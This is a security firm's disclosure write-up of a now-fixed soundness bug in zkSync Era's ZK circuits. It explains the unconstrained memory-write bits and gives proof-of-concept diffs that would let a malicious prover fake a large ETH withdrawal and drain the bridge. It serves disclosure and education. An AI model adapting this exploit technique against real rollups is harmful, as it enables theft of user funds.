Patch Thursday — Uncovering a ZK-EVM Soundness Bug in zkSync Era

Published in

ChainLight Blog & Research

15 min readNov 2, 2023

ChainLight researchers identified a soundness bug in the ZK-circuits for the zkSync Era mainnet on September 15th and promptly reported the issue on the 19th. The bug allowed a malicious prover to produce “proofs” for invalidly executed blocks, which the verifier smart contracts on L1 would have accepted. Matter Labs has deployed a fix for the issue and awarded ChainLight a 50K USDC reward for disclosing the issue, the first bounty to be claimed for a ZK-circuit bug in zkSync Era.

This post will detail how we discovered the issue and explain how our proof-of-concept exploit works.

Background

To help readers understand the nature of this bug, we provide the following background information:

Validity Proofs
Zero-Knowledge Rollups (ZK-Rollups and Validiums)
ZK-EVM
Structure of zkSync Era

Validity Proofs

Validity proofs refer to a broad class of cryptographic tools which enable verifiable computation. By verifiable computation, we mean that one party (the prover) can perform some expensive computation, such as executing a bunch of transactions on a blockchain, and produce a proof that the computation was done correctly. This proof must be relatively small (compared to the amount of computation it proves) and must be computationally cheap to verify.

In practice today, most validity proof systems use ZK-STARKs or ZK-SNARKs, so validity proofs are sometimes called “ZK-proofs.” In these systems, the correctness of the computation is enforced by constraints derived from a “ZK-circuit,” which describes the computation. It is critical that these circuits correctly constrain the inputs and outputs according to the computation rules, or else a malicious prover could produce “proofs” for invalid computation, known as a soundness error.

ZK-Rollups and Validiums

Verifiable computation is a fundamental tool for scaling blockchain applications. Typically, any computation performed on a blockchain is repeated by each node in the network. This model inherently leads to a trade-off between decentralization and scalability because mass decentralization can only be achieved if the hardware requirements to run a node are reasonably low. Verifiable computation solves this issue by introducing asymmetric requirements: only one party performs the expensive computation, but all other participants can cheaply verify the correctness.

While validity proofs may one day be used to scale blockchains such as Ethereum directly, they are currently primarily used to create second-layer (L2) blockchains that settle to an existing (L1) blockchain.

L2 blockchains using validity proofs perform the following two roles using smart contracts:

Store their state roots on the L1 blockchain.
Verify proof of validity corresponding to the state root to ensure correct execution of blocks.

Without delving extensively into the terminology debate, L2s using ZK-based validity proofs are called either “ZK-rollups” or “Validiums.”

ZK-EVMs

In general, ZK-EVM refers to any execution environment modeled “closely” after the EVM which can be validity proven. Various types of ZK-EVMs exist with different similarities to the Ethereum standard. The gold standard is a type-1 ZK-EVM, which could be used to natively scale the Ethereum base layer, but many ZK-EVMs make adjustments in order to increase proving efficiency.

ZK-rollups or Validiums that settle to Ethereum are not required to be based on ZK-EVMs, but the amount of EVM-based tooling and developers makes it an attractive option.

zkSync Era

zkSync Era is a ZK-powered scaling solution for Ethereum, which is currently the most used L2 with a transaction volume rivaling Ethereum itself. Thus, it is one of the most critical pieces of infrastructure in the crypto space. zkSync Era was created by the team at Matter Labs. As one of the core contributors to the protocol, they have stated since inception that security is “the most critical aspect of launching zkSync Era to the public,” which is supported by their multi-layered security approach. While using multiple security layers is common practice amongst L2s, they are sometimes called “training wheels” by the community because they are seen as a temporary measure needed only in these early stages. In fact, for most of these L2s to meet their decentralization goals, some of these layers must be removed or significantly adapted. For instance, all governance roles currently controlled by an internal multi-sig must (at minimum) be placed behind an appropriately long timelock and allow users to exit before the action.

As the training wheels get removed, the correctness of the validity proof scheme becomes paramount. Below, we’ll give an overview of how this system works. For further details, we suggest checking out the Code4rena zkSync Era audit docs.

EraVM

zkSync Era’s execution environment is a type-4 ZK-EVM, which supports the same high-level languages as the EVM, such as Solidity, Yul, and Vyper, but compiles to a custom instruction set. The EraVM is somewhat similar to the EVM but has some significant differences. To name a few:

The EraVM is register-based, while the EVM is stack-based. In some cases, the EraVM still uses a stack as temporary storage, like when it runs out of registers, but most opcodes will take register operands.
The EraVM has two heaps (the heap and the aux heap), which can be used for temporary memory and to pass data between contracts. In order to emulate calldata and returndata semantics from the EVM, the EraVM explicitly tracks whether each 256-bit value is a pointer into another heap, which is called a “fat pointer”, and enforces rules for how fat pointers can be passed between contracts.
Inter-contract calls do not have a value. Thus, they can not transfer ETH directly.

In order to more closely match the EVM semantics, the EraVM uses a set of “system contracts” that run in “kernel mode” and have permission to execute privileged instructions. For example, since calls cannot natively transfer ETH, ETH balance tracking and transferring are instead handled by a system contract called L2EthToken. To perform a call that also transfers ETH, you instead call the MsgValueSimulator system contract, which uses its kernel privileges to perform the ETH transfer and then execute a “mimic” call, giving the callee the appearance that it was called directly.

The zkSync Era software stack uses multiple implementations of the EraVM:

The zk_evm repo: an out-of-circuit implementation used by the sequencer and any other nodes. The prover also uses this implementation to create a detailed execution trace, which is used as “witness” data for the circuits.
The sync_vm repo: a ZK-circuit implementation, which produces the actual constraints that get proven and verified on Ethereum.

EraVM ZK-Circuits

The EraVM circuits are quite complex but are the core technology behind the entire network. Due to the complexity, we will only touch on a few parts of the circuits that are relevant to the identified soundness issue; for more details, check out these docs.

Since any ZK-circuit produces a fixed number of constraints, proving arbitrary amounts of computation requires recursive circuits that verify proofs of other circuits. Additionally, the responsibilities are divided between many circuits, constraining different parts of the computation. Ultimately, all of the proofs get aggregated into a single proof, verified by a smart contract on Ethereum.

zkSync EraVM Circuit Architecture(Source)

For our purposes, we’ll focus on these two circuits:

Main VM: Constrains the sequence of instructions executed, the inputs and outputs of basic instructions such as arithmetics, and produces a queue of partially-constrained results to be further constrained by other circuits.
RAM Permutation: Validates that the “memory queue” (list of memory operations) produced by the Main VM circuit (and other circuits that access memory) is self-consistent.

Memory Queue

Based on the two circuits highlighted above, the issue is likely related to memory operations. So it is worth first spending more time on how memory reads and writes get constrained.

Since memory can be written by operations handled in other circuits, such as code de-commitment and Keccak hashing, the main VM circuit cannot constrain memory reads on its own. Instead, any time it reads or writes a value to or from memory, it appends the operation to the memory queue.

The memory queue commits to a sequence of MemoryQuery objects, which specify 4 things:

when the access occurred (relative to other instructions)
which memory was accessed
whether it was read or written
what value was read or written

pub struct MemoryQuery<E: Engine> {
  pub timestamp: UInt32<E>,
  pub memory_page: UInt32<E>,
  pub memory_index: UInt32<E>,
  pub rw_flag: Boolean,
  pub value: UInt256<E>,
  pub value_is_ptr: Boolean,
}

Using the queue, the Main VM circuit can handle “store” (memory write) instructions by constraining that the source register value is placed into a “write” MemoryQuery (with the destination memory location) and appended to the queue. Handling reads is more complicated because the Main VM circuit cannot know on its own what value should exist at a given address (because other circuits can edit memory). Therefore, in order to handle reads, the circuit can load a witness value into the register and append a “read” MemoryQuery to the queue with the claimed value.

After all memory operations are committed to by the various circuits, the RAM Permutation circuit checks their consistency. This circuit takes two memory queues as input:

The committed queue from the Main VM circuits (and other memory-accessing circuits).
A witness “sorted” queue is constrained to contain the same set of MemoryQuery objects but must be sorted by (memory_page, memory_index, timestamp).

By sorting the accesses this way, the RAM Permutation circuit can check memory consistency by iterating the queue once and comparing adjacent elements.

In pseudocode:

if (prev.memory_page, prev.memory_index) == (cur.memory_page, cur.memory_index) {
  // if cur accesses the same location as the previous, it must either be a write
  // OR have the same value as the previous access
  assert!(cur.rw_flag || cur.value == prev.value);
} else {
  // if cur accesses a new location, it must either be a write OR read the zero value
  assert!(cur.rw_flag || cur.value == 0);
}

Of course, the actual code producing these constraints is nontrivial. For example, checking that the committed and sorted queues contain the same elements is done using a permutation argument, a common trick used in ZK-proofs.

Bug Details

We’ve now covered enough background to get into the bug. As is often the case, the devil is in the implementation details.

The first important implementation detail is that the above MemoryQuery struct is actually a slightly simplified version of what the queue contains. These MemoryQuery structs get converted into RawMemoryQuery form:

pub struct RawMemoryQuery<E: Engine> {
  pub timestamp: UInt32<E>,
  pub memory_page: UInt32<E>,
  pub memory_index: UInt32<E>,
  pub rw_flag: Boolean,
  pub value_residual: UInt64<E>,
  pub value: Num<E>,
  pub value_is_ptr: Boolean,
}

Notice the difference: the value field used to be a UInt256<E>, but now has been split into two fields with types Num<E> and UInt64<E>. This conversion is because the curve used in the circuits (bn254) can only reliably store 253 bits in a single field element. In fact, the UInt256<E> type internally stores the value as 4 Uint64<E> values, each in their own Num<E>. In a RawMemoryQuery, the value field stores the lower 192 bits of the value, while the value_residual field stores the upper 64 bits. For efficiency reasons, the RawMemoryQuery ultimately gets encoded as 2 Num<E> values before being appended to the queue:

impl<E: Engine> RawMemoryQuery<E> {
  pub fn pack<CS: ConstraintSystem<E>>(
    &self,
    cs: &mut CS,
  ) -> Result<[Num<E>; 2], SynthesisError> {
    let shifts = compute_shifts::<E::Fr>();
    let el0 = self.value;
    let mut shift = 0;
    let mut lc = LinearCombination::zero();
    		
    lc.add_assign_number_with_coeff(&self.value_residual.inner, shifts[shift]);
    shift += 64;
    		
    // NOTE: we pack is as it would be compatible with PackedMemoryQuery later on
    lc.add_assign_number_with_coeff(&self.memory_index.inner, shifts[shift]);
    shift += 32;
    lc.add_assign_number_with_coeff(&self.memory_page.inner, shifts[shift]);
    shift += 32;
    		
    // ------------
    lc.add_assign_number_with_coeff(&self.timestamp.inner, shifts[shift]);
    shift += 32;
    lc.add_assign_boolean_with_coeff(&self.rw_flag, shifts[shift]);
    shift += 1;
    lc.add_assign_boolean_with_coeff(&self.value_is_ptr, shifts[shift]);
    shift += 1;
    		
    assert!(shift <= E::Fr::CAPACITY as usize);
    	
    let el1 = lc.into_num(cs)?;
    // dbg!(el0.get_value());
    // dbg!(el1.get_value());
    		
    Ok([el0, el1])   	
  }
}

Here is how to understand what is happening in the above code:

cs references the ConstraintSystem, which is passed around through the entire circuit code to accumulate constraints. Generally speaking, a function is expected to produce constraints if and only if it takes cs as an argument.
pack returns [el0, el1], where el0 is taken from self.value, and el1 is constructed by packing the remaining elements into a single Num<E> (explained below).
compute_shifts::<E::Fr>() simply computes all values of (1 << i) for 0 <= i <= 253 as constant field elements. This is just a convenience function that doesn’t produce any circuit constraints on its own.
el1 is constructed by using a LinearCombination, which computes expressions of the form a_0 v_0 + a_1 v_1 + … + a_n v_n where a_i are constant field elements and the v_i are circuit variables. The shifts are used to pack the RawMemoryQuery fields into non-overlapping regions of the 253-bit value. The result of the linear combination is stored in a new variable by calling lc.into_num(cs).

The above code to pack the RawMemoryQuery into two field elements looks sound, so let us now look at how the RawMemoryQuery was first constructed. When handling a memory write instruction, it constructs a MemoryWriteQuery and converts it to a RawMemoryQuery:

let MemoryLocation { page, index } = mem_loc;

let memory_key = MemoryKey {
 timestamp: mem_timestamp_write,
 memory_page: page,
 memory_index: index,
};

let write_query = MemoryWriteQuery::from_key_and_value_witness(cs, memory_key, value)?;

...

let raw_query = write_query.into_raw_query(cs)?;

...

So, how does the MemoryWriteQuery work? In the above code, value is a Register<E>, which stores a 256-bit value as two UInt128<E>s:

pub struct Register<E: Engine> {
  pub inner: [UInt128<E>; 2],
  pub is_ptr: Boolean,
}

When constructing the MemoryWriteQuery, this register value gets further split into 3 values (lowest_128, u64_word_2, u64_word_3) using another LinearCombination:

pub(crate) fn from_key_and_value_witness<CS: ConstraintSystem<E>>(
  cs: &mut CS,
  key: MemoryKey<E>,
  register_output: Register<E>,
) -> Result<Self, SynthesisError> {

  let [lowest_128, highest_128] = register_output.inner;

  let tmp = highest_128
    .get_value()
    .map(|el| (el as u64, (el >> 64) as u64));
   
  let (u64_word_2, u64_word_3) = match tmp {
    Some((a, b)) => (Some(a), Some(b)),
    _ => (None, None),
  };

  let u64_word_2 = UInt64::allocate_unchecked(cs, u64_word_2)?;
  let u64_word_3 = UInt64::allocate(cs, u64_word_3)?;
  let shifts = compute_shifts::<E::Fr>();
  let mut minus_one = E::Fr::one();
   
  minus_one.negate();
  
  let mut lc = LinearCombination::zero();

  lc.add_assign_number_with_coeff(&u64_word_2.inner, shifts[0]);
  lc.add_assign_number_with_coeff(&u64_word_3.inner, shifts[64]);
  lc.add_assign_number_with_coeff(&highest_128.inner, minus_one);
  
  let MemoryKey {
    timestamp,
    memory_page,
    memory_index,
  } = key;

  let new = Self {
    timestamp,
    memory_page,
    memory_index,
    lowest_128,
    u64_word_2,
    u64_word_3,
    value_is_ptr: register_output.is_ptr,
  };
  Ok(new)
}

MemoryWriteQuery::into_raw_query goes on to store u64_word_3 into value_residual, while packing lowest_128 and u64_word_2 into the value field:

pub(crate) fn into_raw_query<CS: ConstraintSystem<E>>(
  &self,
  cs: &mut CS,
) -> Result<RawMemoryQuery<E>, SynthesisError> {
  let shifts = compute_shifts::<E::Fr>();
  let mut lc = LinearCombination::zero();
  
  lc.add_assign_number_with_coeff(&self.lowest_128.inner, shifts[0]);
  lc.add_assign_number_with_coeff(&self.u64_word_2.inner, shifts[128]);
  
  let value = lc.into_num(cs)?;
  
  let new = RawMemoryQuery {
    timestamp: self.timestamp,
    memory_page: self.memory_page,
    memory_index: self.memory_index,
    rw_flag: Boolean::constant(true)
    value_residual: self.u64_word_3,
    value,
    value_is_ptr: self.value_is_ptr,
  };
  
  Ok(new)
}

So, where is the bug? It is subtle, but recall the rule-of-thumb that constraints only get produced by functions that take a cs parameter. Looking again at the from_key_and_value_witness code:

let mut lc = LinearCombination::zero();

lc.add_assign_number_with_coeff(&u64_word_2.inner, shifts[0]);
lc.add_assign_number_with_coeff(&u64_word_3.inner, shifts[64]);
lc.add_assign_number_with_coeff(&highest_128.inner, minus_one);

Unlike the other code using LinearCombinations, this code never actually produces any constraints from lc. Based on the coefficients, it seems the intention is to constrain the lc value to be zero, but to produce these constraints, you must either:

call lc.enforce_zero(cs), or
call lc.into_num(cs) and further constrain the resulting value

As a result, the upper 128 bits in the resulting MemoryWriteQuery are unconstrained. This means a malicious prover could place any value in these bits, and the verifier would accept the proof as valid. In a correctly constrained circuit, the bits would be constrained to be exactly equal to the bits from the Register<E>.

Discovery Process

ChainLight is mostly known as an auditing firm, but we also developed a ZK-powered protocol for trustless historical Ethereum state access called Relic Protocol. Our ZK-circuits are based on Matter Labs’ circuit libraries, where we have previously encountered this footgun with LinearCombination. When we began our review of the zkSync Era circuits, this was the first bug pattern we looked for.

Exploit Details

The bug allows a prover to arbitrarily change the high 128 bits of any value stored in memory (by a store instruction) without changing the validity of the proof. While this could be abused in countless ways, one particularly easy target lies in the L2EthToken system contract.

The code to initiate an ETH withdrawal from zkSync Era back to mainnet is as follows:

/// @notice Initiate the ETH withdrawal, funds will be available to claim on L1 `finalizeEthWithdrawal` method.
/// @param _l1Receiver The address on L1 to receive the funds.
function withdraw(address _l1Receiver) external payable override {
  uint256 amount = _burnMsgValue();

  // Send the L2 log, a user could use it as proof of the withdrawal
  bytes memory message = _getL1WithdrawMessage(_l1Receiver, amount);
  L1_MESSENGER_CONTRACT.sendToL1(message);

  emit Withdrawal(msg.sender, _l1Receiver, amount);
}

/// @dev Get the message to be sent to L1 to initiate a withdrawal.
function _getL1WithdrawMessage(address _to, uint256 _amount) internal pure returns (bytes memory) {
  return abi.encodePacked(IMailbox.finalizeEthWithdrawal.selector, _to, _amount);
}

This method will burn the ETH passed in msg.value before sending an L2->L1 message certifying the withdrawal. Our goal is to burn a small amount of ETH on L2 but create a withdrawal message with a much larger _amount field. Notice that the _getL1WithdrawMessage helper function encodes the withdrawal message into a memory bytes array. This function gets compiled to the following EraVM assembly code:

...

add @CPI0_20[0], r0, r2 // load the function selector into `r2`
ld.1    64, r1          // load the current free memory pointer into `r1`
add 32, r1, r3
st.1    r3, r2          // store function selector into memory at `r1+32`
shl.s   96, r4, r2
add 36, r1, r3
st.1    r3, r2          // store `_to` parameter into memory at `r1+36`
add 56, r1, r2
st.1    r2, r5          // store `_amount` parameter into memory at `r1+56`
add 56, r0, r2
st.1    r1, r2          // store `56` into memory at `r1` (length field)

...

Each of the st.1 instructions stores a register’s value into the heap at the given offset. While these instructions allow misaligned stores to addresses that aren’t multiples of 32, the EraVM will translate misaligned stores into 2 aligned MemoryWriteQuerys. Hence, when storing the _amount parameter, two aligned write queries get created:

{
  memory_page: CUR_HEAP_PAGE,
  memory_index: (r1 + 56) // 32,
  value: (uint256(_to) << 64) | (_amount >> 192)
},
{
  memory_page: CUR_HEAP_PAGE,
  memory_index: (r1 + 56) // 32 + 1,
  value: (_amount << 64)
}

Exploit Code

Our goal is to change the value of the second write query above to increase the amount of ether attested by the withdraw message. For this, we edit the code responsible for handling write queries in each EraVM implementation. Each edit will implement the following logic:

Check if the _amount value being written matches some magic value, such as 0x1371337137 or ~.00002 ETH.
If so, change the high 128 bits (of the misaligned write) to make _amount be a huge value, such as 0x152d0000133713371337 or ~100K ETH

zk_evm repo diff:

diff --git a/src/opcodes/execution/uma.rs b/src/opcodes/execution/uma.rs
index 276c02b..7d2f0d5 100644

- -- a/src/opcodes/execution/uma.rs
+++ b/src/opcodes/execution/uma.rs
@@ -371,6 +371,14 @@ impl<const N: usize, E: VmEncodingMode<N>> DecodedOpcode<N, E> {
  (word_0_read_value >> (word_0_lowest_bytes * 8)) << (word_0_lowest_bytes * 8);
  // add highest bytes into lowest for overwriting
  new_word_0_value = new_word_0_value | (src1 >> (unalignment * 8));
+
+                // see if we're writing 0x1337133713370000000000000000
+                if new_word_0_value.0[1] == 0x133713371337 {
+                    // if so, instead write 0x152d00001337133713370000000000000000
+                    new_word_0_value.0[2] = 0x152d;
+                }
+
  // we need low bytes of old word and place low bytes of src1 into highest
  // cleanup highest bytes
  let mut new_word_1_value =

sync_vm repo diff:

diff --git a/src/vm/vm_cycle/memory_view/write_query.rs b/src/vm/vm_cycle/memory_view/write_query.rs
index cbb4172..0b09ecd 100644

- -- a/src/vm/vm_cycle/memory_view/write_query.rs
+++ b/src/vm/vm_cycle/memory_view/write_query.rs
@@ -60,6 +60,11 @@ impl<E: Engine> MemoryWriteQuery<E> {
  _ => (None, None),
};
+        let u64_word_2 = if let Some(0x1337133713370000000000000000_u128) = lowest_128.get_value() {
+            Some(0x152d)
+        } else {
+            u64_word_2
+        };
// we do not need to range check everything, only N-1 ut of N elements in LC
let u64_word_2 = UInt64::allocate_unchecked(cs, u64_word_2)?;

It is important to note that this change only modifies the witness value assigned to the variable and thus doesn’t change the constraints produced by the circuit.

Executing the exploit

With these code changes in the backend, a sequencer/prover can now process a withdrawal with the magic value of 0x133713371337 wei (~.00002 ETH) and output a proven batch, which attests that the recipient withdrew 0x152d0000133713371337 wei (~100K ETH). The zkSync Era smart contracts will accept this proof, after which the attacker can drain 100K ETH from the bridge.

If you’re interested in more details, check out our PoC code.

Impact

Given the security layers in place today, it would be difficult for anybody except Matter Labs to pull off the exploit above. An attack scenario (for an outside actor) would look as follows:

Compromise the zkSync Era backend to inject the malicious code or steal the zkSync Era validator private key.
Execute the exploit described above.
Wait for the 21-hour execution delay, and hope the team doesn’t freeze the protocol before withdrawing the stolen funds.

As you can see, the execution delay makes practical exploitation of this issue quite difficult today. However, the chances of pulling off such an attack increase significantly in a more decentralized future where an admin team less directly manages the protocol.

Hence, securing the ZK-circuits powering L2s is a crucial part of the long-term scaling roadmap for Ethereum. We commend the zkSync Era team for offering rewards for ZK-circuit bugs and hope that more security researchers will review these critical ZK-circuits going forward.

Reference

About ChainLight

Patch Thursday is ChainLight’s weekly report introducing and analyzing vulnerabilities discovered and reported by our award-winning security researchers. With the mission to assist security researchers and developers in collectively learning, growing, and contributing to making Web3 a safer place, we release our report every week, free of charge.
To receive the latest research and reports conducted by award-winning experts:
👉 Subscribe to our newsletter
👉 Follow @ChainLight_io
Established in 2016, ChainLight’s award-winning experts provide tailored security solutions to fortify your smart contract and help you thrive on the blockchain.